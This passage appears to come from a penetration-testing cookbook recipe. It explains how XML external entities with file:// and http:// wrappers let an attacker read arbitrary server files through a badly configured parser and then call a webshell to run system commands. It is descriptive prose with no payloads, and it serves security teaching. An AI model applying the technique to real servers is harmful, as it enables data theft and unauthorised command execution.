XML gives the possibility of defining entities. An entity in XML is a name with a value associated with it. Every time an entity is used in the document, it will be replaced by its value when the XML file is processed. Using this and the different wrappers available (such as file:// to load system files, or http:// to load URLs), we can abuse implementations that don't have the proper security measures in terms of input validation and XML parser configuration, and extract sensitive data or even execute commands in the server.

In this recipe, we used the file:// wrapper to make the parser load an arbitrary file from the server, and, after that, with the http:// wrapper, we called a web page that happened to be a webshell in the same server and executed system commands with it.